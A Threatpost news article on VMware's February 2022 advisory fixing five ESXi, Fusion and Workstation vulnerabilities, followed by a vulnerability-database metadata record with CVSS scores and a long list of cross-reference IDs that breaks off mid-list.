Critical VMware Bugs Open ESXi, Fusion & Workstation to Attackers

2022-02-16T15:59:14

Description

VMware has issued a critical security update to address issues in its ESXi, Fusion and Workstation products, including VMware Cloud Foundation versions. Exploitation could give attackers access to workloads inside organizations’ virtual environments. The bugs have a range of 5.3 to 8.4 out of 10 on the CVSS vulnerability-severity scale, making them individually “important” or “moderate” issues. However, the virtualization giant noted that they can be chained together for worse outcomes: “Combining these issues may result in higher severity, hence the severity of this [advisory] is at severity level critical.” VMware noted that patching VMware ESXi, Fusion and Workstation is the fastest method to resolve the issues, but organizations could also remove USB controllers from their VMs as a workaround. However, “that may be infeasible at scale…and does not eliminate the potential threat like patching does,” according to the advisory, [issued Tuesday](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>). The issues are as follows: * **CVE-2021-22040:** Use-after-free vulnerability in XHCI USB controller (CVSS 8.4) * **CVE-2021-22041:** Double-fetch vulnerability in UHCI USB controller (CVSS 8.4) * **CVE-2021-22042:** ESXi ‘settingsd’ unauthorized access vulnerability (CVSS 8.2) * **CVE-2021-22043**: ‘ESXi settingsd’ TOCTOU vulnerability (CVSS 8.2) * **CVE-2021-22050:** ESXi slow HTTP POST denial of service vulnerability (CVSS 5.3) ## **USB Controller Bugs** The first two important-rated issues (CVE-2021-22040, CVE-2021-22041) are found in the USB controllers for VMware ESXi, Fusion and Workstation. If exploited, a malicious actor with local administrative privileges on a virtual machine (VM) would be able to execute code as the VM’s Virtual Machine Extension (VMX) process running on the host. The VMX process runs in the VMkernel and is responsible for handling input/output (I/O) to devices that are not critical to performance, according to VMware’s [documentation](<https://blogs.vmware.com/vsphere/2019/07/the-vmotion-process-under-the-hood.html>). ## **‘settingsd’ Security Flaws** The next two issues, also rated important (CVE-2021-22042, CVE-2021-22043), affect the ‘settingsd’ command, which is responsible for settings and host logs, among other things. The first involves the VMX having unauthorized access to settingsd authorization tickets. That means that a malicious actor with privileges within the VMX process could access the settingsd service running as a high-privileged user. The second, a time-of-check time-of-use vulnerability, can be chained with the first. It exists in the way temporary files are handled, and it would allow an attacker with access to settingsd to escalate privileges by writing arbitrary files, according to VMware. ## **Moderate Flaw in ESXi** The final bug (CVE-2021-22050) is the lone “moderate” vulnerability in the group. It only affects the ESXi platform and could allow adversaries to create a denial-of-service (DoS) condition on the hosts by overwhelming the “rhttpproxy” service with multiple requests. A successful exploit requires that the malicious actors already have network access to ESXi, according to the vendor. This is the second major patch release this year affecting [this particular trio of products](<https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/>). Full details of which patches should be applied to remediate the dangers are available in VMware’s [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>). The company said that so far, no in-the-wild attacks have been seen targeting the bugs, though that is likely to quickly change if [past is prelude](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>), so admins should patch quickly. _**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), “The Secret to Keeping Secrets,” sponsored by Keeper Security, will focus on how to locate and lock down your organization’s most sensitive data. Zane Bond with Keeper Security will join Threatpost’s Becky Bracken to offer concrete steps to protect your organization’s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_

{"id": "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Critical VMware Bugs Open ESXi, Fusion & Workstation to Attackers", "description": "VMware has issued a critical security update to address issues in its ESXi, Fusion and Workstation products, including VMware Cloud Foundation versions. Exploitation could give attackers access to workloads inside organizations\u2019 virtual environments.\n\nThe bugs have a range of 5.3 to 8.4 out of 10 on the CVSS vulnerability-severity scale, making them individually \u201cimportant\u201d or \u201cmoderate\u201d issues. However, the virtualization giant noted that they can be chained together for worse outcomes: \u201cCombining these issues may result in higher severity, hence the severity of this [advisory] is at severity level critical.\u201d\n\nVMware noted that patching VMware ESXi, Fusion and Workstation is the fastest method to resolve the issues, but organizations could also remove USB controllers from their VMs as a workaround. However, \u201cthat may be infeasible at scale\u2026and does not eliminate the potential threat like patching does,\u201d according to the advisory, [issued Tuesday](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>).\n\nThe issues are as follows:\n\n * **CVE-2021-22040:** Use-after-free vulnerability in XHCI USB controller (CVSS 8.4)\n * **CVE-2021-22041:** Double-fetch vulnerability in UHCI USB controller (CVSS 8.4)\n * **CVE-2021-22042:** ESXi \u2018settingsd\u2019 unauthorized access vulnerability (CVSS 8.2)\n * **CVE-2021-22043**: \u2018ESXi settingsd\u2019 TOCTOU vulnerability (CVSS 8.2)\n * **CVE-2021-22050:** ESXi slow HTTP POST denial of service vulnerability (CVSS 5.3)\n\n## **USB Controller Bugs**\n\nThe first two important-rated issues (CVE-2021-22040, CVE-2021-22041) are found in the USB controllers for VMware ESXi, Fusion and Workstation. If exploited, a malicious actor with local administrative privileges on a virtual machine (VM) would be able to execute code as the VM\u2019s Virtual Machine Extension (VMX) process running on the host.\n\nThe VMX process runs in the VMkernel and is responsible for handling input/output (I/O) to devices that are not critical to performance, according to VMware\u2019s [documentation](<https://blogs.vmware.com/vsphere/2019/07/the-vmotion-process-under-the-hood.html>).\n\n## **\u2018settingsd\u2019 Security Flaws**\n\nThe next two issues, also rated important (CVE-2021-22042, CVE-2021-22043), affect the \u2018settingsd\u2019 command, which is responsible for settings and host logs, among other things.\n\nThe first involves the VMX having unauthorized access to settingsd authorization tickets. That means that a malicious actor with privileges within the VMX process could access the settingsd service running as a high-privileged user.\n\nThe second, a time-of-check time-of-use vulnerability, can be chained with the first. It exists in the way temporary files are handled, and it would allow an attacker with access to settingsd to escalate privileges by writing arbitrary files, according to VMware.\n\n## **Moderate Flaw in ESXi**\n\nThe final bug (CVE-2021-22050) is the lone \u201cmoderate\u201d vulnerability in the group. It only affects the ESXi platform and could allow adversaries to create a denial-of-service (DoS) condition on the hosts by overwhelming the \u201crhttpproxy\u201d service with multiple requests.\n\nA successful exploit requires that the malicious actors already have network access to ESXi, according to the vendor.\n\nThis is the second major patch release this year affecting [this particular trio of products](<https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/>). Full details of which patches should be applied to remediate the dangers are available in VMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>).\n\nThe company said that so far, no in-the-wild attacks have been seen targeting the bugs, though that is likely to quickly change if [past is prelude](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>), so admins should patch quickly.\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "published": "2022-02-16T15:59:14", "modified": "2022-02-16T15:59:14", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/critical-vmware-bugs-esxi-fusion-workstation/178461/", "reporter": "Tara Seals", "references": ["https://www.vmware.com/security/advisories/VMSA-2022-0004.html", "https://blogs.vmware.com/vsphere/2019/07/the-vmotion-process-under-the-hood.html", "https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/", "https://www.vmware.com/security/advisories/VMSA-2022-0004.html", "https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/", "https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar", "https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar"], "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-02-16T16:18:14", "viewCount": 506, "enchantments": {"backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS2-2021-1730", "ALAS2-2021-1731"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-44228"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-44228"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392"]}, {"type": "fedora", "idList": ["FEDORA:59AA230A7074"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-JFH8-C2JP-5V3Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "14482532-2406-58DF-89FF-30B085015257", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "70582B5B-E1E6-5767-94A6-39740A96A052", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4A33F39-BA6F-5AC0-B72C-30F0E4D6CD56", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B5D61CFC-8A10-5D92-B72B-D002C1D7AF33", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E07C4625-66EE-5E09-880C-251E6273C21A", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", 